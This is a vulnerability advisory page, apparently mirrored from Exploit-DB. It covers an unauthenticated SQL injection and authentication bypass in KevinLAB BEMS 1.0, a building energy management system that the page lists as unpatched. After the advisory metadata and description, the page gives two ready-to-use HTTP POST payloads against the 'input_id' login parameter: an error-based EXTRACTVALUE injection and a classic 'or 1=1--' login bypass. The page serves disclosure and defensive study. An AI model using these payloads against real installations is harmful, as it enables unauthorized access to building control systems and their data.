KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass

vendor:

Building Energy Management System

by:

LiquidWorm

8,8

CVSS

HIGH

SQL Injection / Authentication Bypass

CWE

Product Name: Building Energy Management System

Affected Version From: 4ST L-BEMS 1.0.0

Affected Version To: 4ST L-BEMS 1.0.0

Patch Exists: NO

Related CWE: N/A

CPE: a:kevinlab:bems:1.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux CentOS 7, Apache 2.4.6, Python 2.7.5, PHP 5.4.16, MariaDB 5.5.68

2021

KevinLAB BEMS 1.0 – Unauthenticated SQL Injection / Authentication Bypass

The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to construct SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com

Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)

Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficient of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.

Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
mechanism.

Tested on: Linux CentOS 7
           Apache 2.4.6
           Python 2.7.5
           PHP 5.4.16
           MariaDB 5.5.68


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5655
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php


05.07.2021

--


PoC POST data payload (extract):
--------------------------------

POST /http/index.php HTTP/1.1
Host: 192.168.1.3

requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]


PoC POST data payload (authbypass):
-----------------------------------

POST /http/index.php HTTP/1.1
Host: 192.168.1.3

requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]